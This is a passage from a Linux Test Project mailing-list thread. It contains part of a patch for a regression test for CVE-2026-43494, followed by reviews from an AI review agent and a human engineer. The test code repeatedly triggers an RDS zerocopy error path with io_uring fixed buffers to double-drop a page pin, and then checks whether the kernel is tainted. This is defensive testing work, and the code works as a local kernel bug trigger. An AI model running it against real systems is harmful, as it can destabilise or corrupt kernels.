+ tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
+ }
+
+ /*
+ * Allocate two adjacent pages: the first one will be pinned as an
+ * io_uring fixed buffer, and the second one will be made inaccessible.
+ */
+ mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mapped_pages, 0xa5, page_size);
+
+ /*
+ * RDS should successfully pin the first page, then fault on the second.
+ * That fault drives the buggy zerocopy error cleanup path.
+ */
+ SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
+
+ fixed_iov.iov_base = mapped_pages;
+ fixed_iov.iov_len = page_size;
+
+ /*
+ * Register only the first page as an io_uring fixed buffer. This creates
+ * the long-term page pin whose reference accounting the RDS bug damages.
+ */
+ if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1))
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
+
+ /*
+ * Clone the fixed buffer registration into the second ring, matching the
+ * public reproducer's lifetime pattern without performing the later
+ * page-cache overwrite stage.
+ */
+ if (clone_buffers(ring_fd2, ring_fd1)) {
+ if (errno == EINVAL || errno == EOPNOTSUPP)
+ tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
+ }
+}
+
+static void trigger(void)
+{
+ struct sockaddr_in bind_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = 0,
+ };
+ struct sockaddr_in dst_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ };
+ char control[CMSG_SPACE(sizeof(uint32_t))];
+ struct cmsghdr *cmsg;
+ struct iovec iov = {
+ .iov_base = mapped_pages,
+ .iov_len = 2 * page_size,
+ };
+ struct msghdr msg = {
+ .msg_name = &dst_addr,
+ .msg_namelen = sizeof(dst_addr),
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = control,
+ .msg_controllen = sizeof(control),
+ };
+ int ret;
+ int val;
+ int i, efaults, first_bad_errno = 0;
+
+ /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
+ val = 1;
+ if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
+ if (errno == ENOPROTOOPT || errno == EINVAL)
+ tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
+ }
+
+ val = 2 * page_size * 4;
+ SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
+
+ /*
+ * Bind to a kernel-assigned loopback port and send to the next port
+ * (unbound). The sends are expected to fail before any useful delivery;
+ * the faulting iovec is the interesting part.
+ */
+ SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
+ dst_addr.sin_port = htons(TST_GETSOCKPORT(rds_fd) + 1);
+
+ memset(control, 0, sizeof(control));
+ cmsg = (struct cmsghdr *)control;
+ cmsg->cmsg_level = SOL_RDS;
+ cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
+ cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
+
+ /*
+ * Each send pins page 0, faults on page 1 (PROT_NONE), and on a
+ * vulnerable kernel double-drops page 0's reference. EFAULT is the
+ * expected error; other errors do not count as successful steals.
+ */
+ for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
+ /* rds_cmsg_zcopy() in net/rds/send.c */
+ *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
+
+ ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
+ if (ret >= 0)
+ tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
+
+ if (errno == EFAULT)
+ efaults++;
+ else if (!first_bad_errno)
+ first_bad_errno = errno;
+ }
+
+ if (first_bad_errno) {
+ tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
+ first_bad_errno, tst_strerrno(first_bad_errno));
+ }
+
+ tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ if (efaults == 0)
+ tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
+
+ if (efaults < GUP_PIN_COUNTING_BIAS)
+ tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
+ efaults, GUP_PIN_COUNTING_BIAS);
+}
+
+static void poke_rss_accounting(void)
+{
+ char *mem;
+
+ mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mem, 0x5a, RSS_CHECK_SIZE);
+ SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
+}
+
+static void run(void)
+{
+ pid_t pid;
+ int i;
+
+ /*
+ * Run the dangerous part in a child so that process teardown can expose
+ * delayed RSS/page-accounting damage before the parent reports TPASS.
+ */
+ pid = SAFE_FORK();
+ if (!pid) {
+ trigger();
+ exit(0);
+ }
+
+ tst_reap_children();
+
+ /*
+ * Unregistering fixed buffers after FOLL_PIN has been drained triggers
+ * the double-unpin WARN/BUG_ON on vulnerable kernels.
+ */
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted after buffer unregistration");
+ return;
+ }
+
+ /*
+ * The visible failure can be delayed until another mm is torn down.
+ * Fork all RSS children in parallel, then reap and check taint once.
+ */
+ for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
+ pid = SAFE_FORK();
+ if (!pid) {
+ poke_rss_accounting();
+ exit(0);
+ }
+ }
+
+ tst_reap_children();
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
+ return;
+ }
+
+ /*
+ * RDS/page cleanup can run asynchronously after userspace returns from
+ * sendmsg() and after file descriptors are closed. Wait before declaring
+ * that the kernel merely "seems" to have survived.
+ */
+ for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
+ sleep(1);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
+ return;
+ }
+ }
+
+ tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
+}
+
+static void cleanup(void)
+{
+ if (ring_fd2 >= 0) {
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ SAFE_CLOSE(ring_fd2);
+ }
+
+ if (ring_fd1 >= 0) {
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ SAFE_CLOSE(ring_fd1);
+ }
+
+ if (rds_fd >= 0)
+ SAFE_CLOSE(rds_fd);
+
+ if (mapped_pages) {
+ SAFE_MUNMAP(mapped_pages, 2 * page_size);
+ mapped_pages = NULL;
+ }
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+ .timeout = 60,
+ .forks_child = 1,
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_RDS",
+ "CONFIG_RDS_TCP",
+ "CONFIG_IO_URING",
+ NULL
+ },
+ .save_restore = (const struct tst_path_val[]) {
+ {"/proc/sys/kernel/io_uring_disabled", "0",
+ TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
+ {}
+ },
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "e17492979319"},
+ {"CVE", "2026-43494"},
+ {}
+ }
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* Re: [LTP] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks
2026-06-04 16:38 ` [LTP] [PATCH v5 1/2] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks Sebastian Chlad
2026-06-04 16:38 ` [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test Sebastian Chlad
@ 2026-06-04 18:00 ` linuxtestproject.agent
1 sibling, 0 replies; 19+ messages in thread
From: linuxtestproject.agent @ 2026-06-04 18:00 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: ltp
Hi Sebastian,
On Thu, 4 Jun 2026, Sebastian Chlad wrote:
> lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks
--- [PATCH 2/2] ---
testcases/kernel/syscalls/io_uring/.gitignore lists io_uring01..io_uring03
but the new io_uring04 binary is not added to it.
> + ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
> + if (ret >= 0)
> + tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
> +
> + if (errno == EFAULT)
> + efaults++;
sendmsg() is the subject syscall here and must be wrapped in TEST()
rather than called bare. Switch to TST_RET / TST_ERR instead of
ret / errno.
> + if (efaults < GUP_PIN_COUNTING_BIAS)
> + tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN "
> + "counter may not be fully drained",
> + efaults, GUP_PIN_COUNTING_BIAS);
When fewer than GUP_PIN_COUNTING_BIAS sends returned EFAULT the pin
reference counter is not fully drained. The test then continues to
unregister buffers and can end with TPASS without having exercised
the vulnerable path.
TWARN is not sufficient here; the run should be aborted with TCONF
or TBROK so the incomplete trigger is not silently reported as a pass.
> + for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
> + sleep(1);
> +
> + if (tst_taint_check()) {
sleep() must not be used for synchronization even inside a polling
loop. For deferred kernel actions the expected pattern is an
exponential-backoff polling loop, e.g. TST_RETRY_FN_EXP_BACKOFF().
Verdict: Needs revision
---
Note:
The agent can sometimes produce false positives although often its
findings are genuine. If you find issues with the review, please
comment this email or ignore the suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test
2026-06-04 16:38 ` [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test Sebastian Chlad
@ 2026-06-05 15:30 ` Martin Doucha
0 siblings, 0 replies; 19+ messages in thread
From: Martin Doucha @ 2026-06-05 15:30 UTC (permalink / raw)
To: Sebastian Chlad, ltp; +Cc: Sebastian Chlad
Hi,
one minor suggestion below, otherwise for both patches:
Reviewed-by: Martin Doucha <mdoucha@suse.cz>
On 6/4/26 18:38, Sebastian Chlad wrote:
> + /*
> + * Each send pins page 0, faults on page 1 (PROT_NONE), and on a
> + * vulnerable kernel double-drops page 0's reference. EFAULT is the
> + * expected error; other errors do not count as successful steals.
> + */
> + for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
AFAICT, you need to get GUP_PIN_COUNTING_BIAS EFAULTs to successfully
reproduce the main bug. It might be better to change the loop condition
like this:
for (...; efaults < GUP_PIN_COUNTING_BIAS && i < 10 *
GUP_PIN_COUNTING_BIAS; ...) {
Then you'll have some extra margin for exhausting the pin counter even
if you can't steal a pin in every iteration. Though I suppose triggering
enough EFAULTs is not a problem at the moment.
> + /* rds_cmsg_zcopy() in net/rds/send.c */
> + *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
> +
> + ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
> + if (ret >= 0)
> + tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
> +
> + if (errno == EFAULT)
> + efaults++;
> + else if (!first_bad_errno)
> + first_bad_errno = errno;
> + }
> +
> + if (first_bad_errno) {
> + tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
> + first_bad_errno, tst_strerrno(first_bad_errno));
> + }
> +
> + tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
> + efaults, GUP_PIN_COUNTING_BIAS);
> +
> + if (efaults == 0)
> + tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
> +
> + if (efaults < GUP_PIN_COUNTING_BIAS)
> + tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
> + efaults, GUP_PIN_COUNTING_BIAS);
> +}
--
Martin Doucha mdoucha@suse.cz
SW Quality Engineer
SUSE LINUX, s.r.o.
CORSO IIa
Krizikova 148/34
186 00 Prague 8
Czech Republic
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
end of thread, other threads:[~2026-06-05 15:31 UTC | newest]
Thread overview: 19+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-05-23 10:17 [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test Sebastian Chlad
2026-05-23 11:19 ` [LTP] " linuxtestproject.agent
2026-05-25 9:36 ` Cyril Hrubis
2026-05-29 10:18 ` Andrea Cervesato via ltp
2026-05-29 11:56 ` Cyril Hrubis
2026-05-23 11:39 ` [LTP] [PATCH v2] " Sebastian Chlad
2026-05-23 13:30 ` [LTP] " linuxtestproject.agent
2026-05-23 15:10 ` [LTP] [PATCH v3] " Sebastian Chlad
2026-05-23 16:17 ` [LTP] " linuxtestproject.agent
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
2026-05-23 18:07 ` [LTP] " linuxtestproject.agent
2026-05-24 18:16 ` [LTP] [PATCH v4] " Petr Vorel
2026-05-28 16:45 ` Martin Doucha
2026-05-28 21:31 ` Petr Vorel
2026-05-28 16:36 ` Martin Doucha
2026-06-04 16:38 ` [LTP] [PATCH v5 1/2] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks Sebastian Chlad
2026-06-04 16:38 ` [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test Sebastian Chlad
2026-06-05 15:30 ` Martin Doucha
2026-06-04 18:00 ` [LTP] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks linuxtestproject.agent
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.